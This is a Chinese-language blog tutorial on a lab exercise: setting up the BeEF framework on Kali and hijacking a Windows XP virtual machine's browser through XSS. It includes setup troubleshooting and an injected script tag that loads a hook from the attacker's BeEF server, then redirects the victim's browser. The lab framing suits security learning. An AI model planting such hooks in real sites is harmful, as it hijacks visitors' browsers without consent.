XSS篇-Beef实验一:劫持客户端浏览器

测试环境

服务器:win10物理机
目标:winXP虚拟机
工具:Kali虚拟机

实验步骤

记得做实验的时候给虚拟机打好快照

  • 首先我们先配置物理机和虚拟机之间的网络环境,使三者之间可以ping通
  • 先启动kali虚拟机的beef

 #先还是更新一下程序
 apt-get update & apt-get upgrade
 apt-get dist-upgrade
 apt-get clean
 #打开beef
 root@kali:~# cd /user/share/beef-xss
 root@kali:~# beef-xss
 如果是第一次使用会让你创建一个

常见问题(我自己研究了几个小时,网上没有相关案例):


第一次运行的时候有可能会报一次错
1、Ignoring sqlite3-1.4.2  because its extensions are not built. Try: gem pristine sqLite3 -version 1.4.2
解决方法:ctrl+c结束→运行gem pristine sqLite3 -version 1.4.2→再执行beef-xss
2、更改完密码后有可能会报错 You are using the Default credentials
解决方法:vim /usr/share/beef-xss/config.yaml (修改里面的用户名和密码,两个都要修改)
  • 启动成功后 打开http://127.0.0.1:3000/ui/panel (程序会自动打开,如果没有自动打开,自己手动打开并登录)
  • 登录完后在有xss漏洞的地方,上传钩子<script src="http://<IP>:3000/hook.js"></script>
    其中ip为kali的ip地址。
  • 目标机winXP访问页面

  • Kali查看目标机是否上钩

  • 可以看到目标机已经上线,那么我可以在Commands选项中Browser功能里对目标浏览器劫持
    例如:让用户浏览器跳转到指定网页

=======================
Beef其他功能文章:https://blog.csdn.net/jsd2honey/article/details/78683938
在下一章章节我再总结一下beef+msf获取shell权限
=======================

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注